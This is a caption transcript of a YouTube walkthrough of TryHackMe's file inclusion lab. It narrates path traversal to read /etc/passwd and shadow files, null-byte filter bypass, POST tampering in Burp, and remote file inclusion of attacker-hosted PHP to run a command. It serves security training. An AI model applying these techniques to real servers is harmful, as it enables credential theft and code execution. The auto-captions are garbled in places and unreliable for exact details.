TryHackMe! File Inclusion - Beginner Friendly Walkthrough

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hi and welcome again to another video here on try hack me we're gonna do the room called file inclusion in this video it was a viewer's suggestion and the viewer suggested me to use burp suites particularly about something about a post http request now i'm not sure exactly which it is at the moment but let's just get started and let's see if we didn't hit it so the introduction is basically all about what is file inclusion it shows you this picture here where it tells you about a some domain name that got some sort of php file this particular case and you can see there is a get parameter or ul variable whatever you call it called file and it's being equal to usercv.pdf now this user cvpdf is being loaded from somewhere and in this particular case is probably [Music] something that is on the disk because there is no http in front of it now what can be done in this particular case here is is take this query string all the parameters whatever we're going to call it and also the value for your um discretion and that will then enable you to include something different let's say any other file that could be interesting to include so this is what this picture kind of show you that instead of user cv you could write something like var top app and then go directly to the application and then load the user cv.pdf anyways you could also do slash maybe or best dot dot slash dot dot slash for the dot dot slash is going one back basically mean that you are doing a path traversal so you're going backwards into the file structure that is represented right here now i don't know if this is the correct file structure we're going to check out this is a medium room so it should take something to get it done um i did start the machines let's just uh act every click the button why do financial bits happen well it basically it happens whenever the programmer is not validating the input um you should always validate input uh it also is not sanitized and not validated which is of course exactly what happens when you just you know include stuff the risk is basically you can get any file um from the hard disk on the server and of course it depends a lot depending on which user you are on the server and what kind of rights you get so we deployed the the version machine as you can see here and it should be uh what is this oh it's different labs so i guess when we open this page in a new page let me just close some of this yeah it showed me this so this is our lab it would seem so let's go back to the deploy it so nothing much to say about this deployment past traversal now we did talk about it already this is when you do the dot the periods you know period period but dot dot is easy to see them period but this is an actual period the the dot yeah so you do dot dot slash that the slash dot slash and you go back and then you try and read something from the etc folder for example the password file to see you know sometimes you you you can get actual you know hashes from it if it's really lazy admin but also you can see the users to expect so i don't know if we need to do something but uh what does it talk about yeah it basically just talks about how you should see this in your mind with this image so um yeah then if you don't if this is the the particular i'm going to do this um how are we going to do that it doesn't seem like it hmm well no matter no matter so it does talk about this function here called file git content which is a very standard you know php.net isn't it um file gets content the contents and you basically see that this is standard uh function that reads entire file and and and pastes into the word entire it's it's everything so um you read any file and and just basically output that to to well like any is it like it's like remote stuff a local stuff doesn't really matter now so that is the the actual answer to the question down here below uh if i'm not mistaken i've got a pretty quick glance at it so let me just put it in so there's a suggestion here about different places you can try and include to get stuff now if you can get the shadow file you you will be happy because then you basically have all the hashes and then you can just start brute forcing sometimes you know this is also really interesting path it doesn't necessarily have to be root it can be any user which is why it's really important to get the password file because it has all the registered users that have access to the system in the file by that you can just replace the root word with different users sorry yeah different users and then try and look for this particular standard library where the ssh keys are so let's go to the yeah so this is a particular case it's php we just zoom a bit on this you can see that it it does something like include and include will also include stuff but it will include stuff that is reachable for from the um [Music] how can i tell it uh maybe there's actually a text here saying what i'm looking for the word but it will include whatever is is is is reachable so um and it says something about the php code above users get requests to include the file from web pages we call blah blah blah so yeah basically anything that is reachable you know and i guess that kind of kind of settles that um so we've got a question here give lab number one try and read hcc password password file what would the press would be so um it kind of wants me to add a dot is that because we this a do they oh it's because they want me to have it from the no no no they don't lab1.what that's kind of interesting what is that dot for ah lab one oh it's probably because they want me to add like like a whole string thing so yeah okay so lab one let's just you know do a test here and yeah and wherever you see stuff like that you notice that it says warning file inclusion failed to open stream no such directory now we have the path and it says file one equal test so we can try something like um etc password i know this this is gonna fail oh actually redirected from the root interesting i thought we need to do something like you know dot dot slash but anyways we we got it so the answer will probably be this to the to the actual test yeah the hint was yeah it's fine so in lab two what what is the directory specified in the include function i don't see what it means let me just go to have a look and i remember doing the post thing that you asked for it lets you test again what is the what what is the directory specified in the include oh [Music] directory is it includes they mean i'm not exactly sure what they wanted to post yeah okay so yeah sometimes just gonna read the questions like what do they mean because this we all different understand things differently so now i'm gonna go to in part number two of local file inclusion it's got a little bit deeper into loafer including discussed a couple techniques to bypass the filter within the include function well that would in the first cases we checked the code for web app and blah blah so in this particular case it looks like that i'm just trying not to read all the text because oh yeah you can include the null byte thing so if you have some code for example that you know appends this which in this case here it does in a pinch dot php then you can with a nullbyte kinda you know tell it to you know ignore it in a way so that would be looking term like this here just write the normal thing you're gonna write and then percentage zero zero which is a null byte now nullbyte is something that's gonna take a while to explain but you know it is basically just uh a way for the file system or this file descriptor to stop reading and it's gonna you know just [Music] end up with unpredictable results and that's probably his way to say it or ignore the rest this could be a way to say it so i i guess yeah also sometimes you have to do double slashes because there's some you know function looking for slashes or something you know it there's a lot of different cases and and it doesn't cover all of them here but you know some of them mentioned that it's really good so try out lab five and but doesn't it say lack three first let me i think i'm gonna stick to answering the questions because i'm not really sure uh give left three try to read gcc password what does the request look like so it wants you to do this lab three dot whatever and then dot dot slash dot dot slash so let's just go to left three just right test and then the top here and in the um uh we're going to do something like that on slides as i said and then ecc password and then percentage c0 and this particular case we got it again if we remove the null bytes in the bottom you know we're not gonna get anything so we need them all by it as you can see so the answer to all of this is gonna be that all right so which function is causing the directory traversal in lab number four so let's go to level four right test one more time and this is file gig contents it would seem uh in this particular case so let's go to the paste it in you know try to have six check what is the directory that has to be in the what the fly go away uh try out lab6 and check what is the directory that has to be it doesn't make sense right now i'm not really tired so labs did this a6 it did all right so no tests one more time access tonight and out files at image profile folder only so obviously you can understand this question one more time try out lab6 and check what is the directory that has to be [Music] in the input field what is the directory it has to tmh profile it kind of kinda set it right there oh i i i'm gonna stick with this it seems like that is the answer i don't know yeah okay try out lab6 and read etcos release what is the version id so i don't know what they probably gonna hint but oh yeah yeah we know that so let's take i'm not really sure what's right here but we could try something like you know dot slash and just press enter we can also try to add the null by just to try all you know arsenal and this has access tonight and our files at cmh folder only so we could probably put that in front i assume and then by putting that in front of it it kind of you know this is a code thing you know and if you're a programmer you should probably see the code in front of you right now that that is kind of like if statement if if the first argument of this file value is this particular name then boom you have it so the version is 12.40 all righty so now we have remote file inclusion um is that just a real thing it's a really thing so remote filing solution is basically the same you know i guess this picture should do it so we we we we do something like that you know it's it's being read from the you know remote age some http service you know web server whatever and whatever is inside the file called cmd.text you know it's going to be one two interpreted you know in this particular case with this code and the machine will read it and because it's php it's it will allow that this is going to be probably executed in this particular case that's really bad so now that we read something about this um let's go to task number seven is there anything more to do oh yeah there's a challenge okay really good so remediation as developer so it kind of tell you what to do and i i think that is for you to read not really me because not a developer but i have been i just quit it for many years ago because i got tired of the same task over and over again so great job now that you have technique you learn blah blah so let's see capture the flag where captain flag at etc flag one but which which make sure you have the vm attached okay oh it's just let me just open this then so we got some challenges um oh that is quite confusing let me just put it right here so challenge number one this is a post parameter number two okay engine number three and i don't know which challenge is this for questions um [Music] anyways let's assume that let's assume that i'm not sure let's i don't know let me just check this here let's post this superb so i use foxy proxy by the way i installed this so i direct all traffic to burp and then i have burp open already you know i just press intercept on and then i capture something like test it's being posted into burp in this particular case and you can see that this is you know um if funny it's a get request so let's just add this to the repeater so we save it and forward the next one here and this next part is not really sure but it's something to google so i'll just forward this and i want to repeat it kinda gave us a get request now can i assume on this just a chat would be really good um doesn't look like it project options but oh wow no user options configuration library i don't want to zoom on this so i'm just gonna for the sake of this video just you know copy paste it out and this is a get request but it's not a post request just to be clear about this so what does it say the input form is broken you need to send post requests with file parameters and it does seem like that it's also broken in the um in in the html so what i really want to do is just open the you know the inspector pretty fast i can zoom at that and then you know press anywhere just to get focused and then you can basically just alter this to post you know it doesn't really that's about it i guess so we could just take this etc flag one here and just for the sake of burp let's go back to that and inset on and then [Music] say include and now you see that since we changed it we got a perfectly you know configured post request listen that's the repeater forward rests um we kind of got the flag there so let me just take this and paste it in that's the first one um i kinda assume [Music] that this is on challenge number three oh yeah okay so it says playground okay so this is this is probably challenge number two then so this particular example we just captured the request and and didn't really do anything with it but we could have if you wish to see the difference you [Music] copy paste out you know i'm just going to do this for you now and uh no so this is copy pasting is really difficult sometimes come on please thank you this is the post request now as you see when i change it's um [Music] it's more than the bottom and top that is different it is the same but the value the value is being put down in the bottom when it's supposed to question you change that to post that's really it you know that's how the post request is created there's nothing in all the other headers that that does it are created to a a post request so that is just the way to do it so we're going to go back to chain number two and it says welcome guests and so i'm gonna check my couriers as the hint set just to get this part done and go to storage and we can see that it says guest as a value now if i write for example admin here i'm just assuming it's something stupid so kind of yeah so i have it right here and this is welcome admin now i was not really sure what i wanted to do you want me to read the ecc flag so it is basically somewhere we got some value we can edit and i'm waiting to see what we have here just pretty fast so that's it this is the only thing we have and it says include filter stream search file directory and that is because the child number two php file online number 37 is trying to include so if i change this to that and update it uh it directly say includes etc flag whatever so if i for example put just trying to put something on top now i have two slashes just a second there we go can i please get it thank you now we deleted that it says that it appends this php there so we can see we need null bytes so syrup and now that is fixed and then we have a includes not really sure if it means we could try a few more and now that we have it we got the flag so we post it and now we're gonna capture the flag on number three which is website user request to access and request is a method in php that is both get and post and put and whatever it's everything so we're gonna try and get this flag from lab number three so let's go and check it out so let's just put in whatever value you need and say it's so this is the value you put in and it's it's basically let me try two slashes now and it removes it so let's just try a lot of flashes just to see if there's any difference at all no so it would seem that we need some sort of other way of of accessing this particular um file on this so i suggest we're gonna do the same thing here we just take the request record with burp it's always good is record reverb and just send it this is a request it's being sent as a get request so i sent that to repeater and doesn't matter and i'm not really sure if we need to do this um the thing with the requests method is that it it's gonna try and and get the value whatever we have so let me just alter this to post um [Music] let's see warning it it's difficult to see but if i can i render yeah we can see that we got the php and what a lot of flashes that there is right there and something else wrong here what is this i think uh i'm just gonna close them all now just started always because i think there's some tests sent this my mouse is having a little issue with drivers so we see send to repeater forward doesn't matter this is the repeater it's flag number two cookie that's odd oh yeah i remember that uh that's something we did because it saved the um remembers the cookie value from earlier here so i guess we can just ignore that for now so what i kind of suspect is that we're gonna write post here let me just you know take this to a bigger screen and then basically just append the dotted slash that says that it's in smash and then do the ecc flex flag what three and then do null by this is what i suspect it's all about i'll just post that in and send it and render and it kind of didn't do it this particular case yeah so what we kind of forgot here is that this is a post request so we're going to take the value down here i'm putting the button this is just how post works you need to have that question mark anymore and then send it one more time and not really sure we got didn't get an error or anything no errors so what we could try now is to append on the um extra double as amazing sometimes you remove like having extra slashes that could be a a case here and also double dots you know in a way and just trying to see if this is gonna give you anything different um sometimes it it works other times it is this serious is it zero so let me just do more slash see if we can get something it doesn't really seem to be eating that either so what i suspect now is that we're just gonna you know ditch this request here and then go to the lab open inspector zoom a bit pick the form and just alter it again to post but i still have a pretty big hunch that this is a request things let's do test record the request add this to repeater and just skip it from there and we don't need this cookie so what we're gonna do here is basically slash pcc flag 3 and then a null byte and it gave me something different this time so we got a flag called so sometimes it is just better to change it directly compared to try and and you know copy what copy it's enough yeah and then the last one here is gain remote code execution in the playground so let's go and there you go all right so we are to finish the last part here on the the last task and as you can see i already answered it with the flag because yesterday night i had to break the video up into and it was very the last one and it was just very inconvenient but it is the way it is so the way we're gonna get this remote code execution is if you remember we read before something about hosting a file with php code on our own server which basically resolves to starting up a python server on our machine so what i'm talking about is basically it's actually still running there that we create a file called whatever like test.text with some php code in it we are tasked to execute the command called um well attacked execute a command that will give us the host name and in php that is the exit hostname or exec hostname and this is the script we have saved in a text file as you can see now what they're going to do is host it just directly on the machine of ours with python for example so we have a website running and then we can basically just go to the to the lab and say http and write your ipaddress of your own machine and this is the file name and when i press enter now you will see that we include whatever um file with the code and we execute some code on it and this is this is how we get the flag so basically you read about that in the i think it was remote file execution remember file inclusion sorry where you had this sort of thing here talking about you could host something on well basically anywhere but it is just easier to host on your own machine while hacking on trajectory because you have python there already on linux kelly and that kind of gives you this advantage so remote and local file inclusion is basically all about knowing the file system structure and and verifying what kind of i think this is the picture verifying you access downwards in the system what can you get from the system what you grasp and the remote file execution is the one here where you try to include something remotely into the actual server that you are trying to attack in this particular case it was php and php is really easy to misuse because it's such an easy language to execute commands on because of its the way it's being coded it's it's an interpreted language script language it is not something to compile for example so there's many things you can do as opposed to other languages but i guess this is just for this video and once again i just really hope you liked the video and thank you for the shout out you that told me to do this video on facebook in respect to privacy i don't mention any names but thank you i did it it was a fun room if any of you got some more rooms that you want me to do just give me a shout out and i will look at it so next time have a really nice day bye [Music] you

Info

Channel: Security in mind

Views: 9,583

Rating: undefined out of 5

Keywords: File Inclusion, local file inclusion, penetration testing, cyber security, web app testing, local file inclusion attack tutorial, file inclusion, local file inclusion explained, local file inclusion vulnerability, linkedin e learning, udemy wordpress, codecademy, udacity, sans institute, linkedin learning

Id: Ajd0I9CLhiQ

Channel Id: undefined

Length: 39min 59sec (2399 seconds)

Published: Tue Aug 09 2022